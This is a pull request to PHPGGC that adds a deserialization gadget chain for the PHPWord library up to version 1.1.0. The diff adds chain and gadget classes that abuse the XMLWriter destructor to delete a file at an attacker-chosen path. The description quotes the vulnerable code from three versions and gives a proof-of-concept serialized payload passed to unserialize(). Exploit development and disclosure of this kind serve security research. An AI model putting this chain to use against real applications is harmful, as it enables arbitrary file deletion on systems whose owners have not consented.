### PR TITLE
PHPWord: Added FD/1, which targets PHPWord versions <= 1.1.0

### DIFF
--- a/gadgetchains/PHPWord/FD/1/chain.php
+++ b/gadgetchains/PHPWord/FD/1/chain.php
@@ -1,0 +1,20 @@
+<?php
+
+namespace GadgetChain\PHPWord;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '*';
+    public static $vector = '__destruct';
+    public static $author = 'coiffeur';
+    public static $information = '
+        Note that some files may not be removed (depends on permissions).
+        Target versions: commit 77438025265482ddcf050bce520d3c2b51645108, 30 May 2023 (~1.1.0) <= exploitable.
+        Depending on the version, the attribute name may vary between "_tempFileName", "tempFile" and "tempFileName".
+    ';
+
+    public function generate(array $parameters)
+    {
+        return new \PhpOffice\PhpWord\Shared\XMLWriter($parameters['remote_path']);
+    }
+}

--- a/gadgetchains/PHPWord/FD/1/gadgets.php
+++ b/gadgetchains/PHPWord/FD/1/gadgets.php
@@ -1,0 +1,13 @@
+<?php
+
+namespace PhpOffice\PhpWord\Shared;
+
+class XMLWriter
+{
+    public $tempFileName;
+
+    public function __construct($remote_path) {
+        $this->tempFileName = $remote_path;
+    }
+
+}


### PR DESCRIPTION
I would like to add my [PHPWord](https://github.com/PHPOffice/PHPWord) gadget chain to PHPGGC.

> A pure PHP library for reading and writing word processing documents.

- Library name:
  - PHPWord
- GitHub repository:
  - PHPOffice / PHPWord
- URL:
  - [https://github.com/PHPOffice/PHPWord](https://github.com/PHPOffice/PHPWord)

## Why?

Below is the responsible code.

File: <span style="color:red">src/PhpWord/Shared/XMLWriter.php</span><br>
Version: Commit <= [77438025265482ddcf050bce520d3c2b51645108](https://github.com/PHPOffice/PHPWord/commit/77438025265482ddcf050bce520d3c2b51645108)
```php
<?php

...

namespace PhpOffice\PhpWord\Shared;

use Exception;
use ReturnTypeWillChange;

...

class XMLWriter extends \XMLWriter
{
    /** Temporary storage method */
    const STORAGE_MEMORY = 1;
    const STORAGE_DISK = 2;

    /**
     * Temporary filename.
     *
     * @var string
     */
    private $tempFileName = '';

    ...

    /**
     * Destructor.
     */
    public function __destruct()
    {
        // Unlink temporary files
        if (empty($this->tempFileName)) {
            return;
        }
        if (PHP_OS != 'WINNT' && @unlink($this->tempFileName) === false) {
            throw new Exception('The file ' . $this->tempFileName . ' could not be deleted.');
        }
    }

    ...

}
```

File: <span style="color:red">src/PhpWord/Shared/XMLWriter.php</span><br>
Version: Commit <= [f359825cb7abdd0e92fa333237cb37d160504448](https://github.com/PHPOffice/PHPWord/commit/f359825cb7abdd0e92fa333237cb37d160504448)
```php
<?php

...

namespace PhpOffice\PhpWord\Shared;

use PhpOffice\PhpWord\Settings;

...

class XMLWriter
{

    /** Temporary storage location */
    const STORAGE_MEMORY = 1;
    const STORAGE_DISK = 2;

    /**
     * Internal XMLWriter
     *
     * @var \XMLWriter
     */
    private $xmlWriter;

    /**
     * Temporary filename
     *
     * @var string
     */
    private $tempFile = '';

    ...

    /**
     * Destructor
     */
    public function __destruct()
    {
        // Destruct XMLWriter
        unset($this->xmlWriter);

        // Unlink temporary files
        if ($this->tempFile != '') {
            @unlink($this->tempFile);
        }
    }

    ...

}
```

File: <span style="color:red">src/PhpWord/Shared/XMLWriter.php</span><br>
Version: Commit <= [07be5eaea326a43fe0c68b6231c4a74e9639dd99](https://github.com/PHPOffice/PHPWord/commit/b75403f9a11049be92c03b37b7ecf18dd3a692ba#diff-366ebb5bb00462f39eeea7751c865b282d21870997e50c48deb2089d19241d56)
```php
<?php

...

namespace PhpOffice\PhpWord\Shared;

use PhpOffice\PhpWord\Settings;

...

class XMLWriter
{

    /** Temporary storage method */
    const STORAGE_MEMORY = 1;
    const STORAGE_DISK = 2;

    /**
     * Internal XMLWriter
     *
     * @var \XMLWriter
     */
    private $_xmlWriter;

    /**
     * Temporary filename
     *
     * @var string
     */
    private $_tempFileName = '';

    ...

    /**
     * Destructor
     */
    public function __destruct()
    {
        // Desctruct XMLWriter
        unset($this->_xmlWriter);

        // Unlink temporary files
        if ($this->_tempFileName != '') {
            @unlink($this->_tempFileName);
        }
    }

    ...

}
```

## How?

### Proof Of Concept

```bash
$ git clone https://github.com/PHPOffice/PHPWord.git
$ cd PHPWord
$ php composer.phar install
```

Then we create the file <span style="color:red">test.php</span> as follows.

File: <span style="color:red">test.php</span>
```php
<?php

require_once 'bootstrap.php';

$s = 'a:2:{i:7;O:34:"PhpOffice\PhpWord\Shared\XMLWriter":1:{s:12:"tempFileName";s:9:"/tmp/AAAA";}i:7;i:7;}';
$o = unserialize($s);

?>
```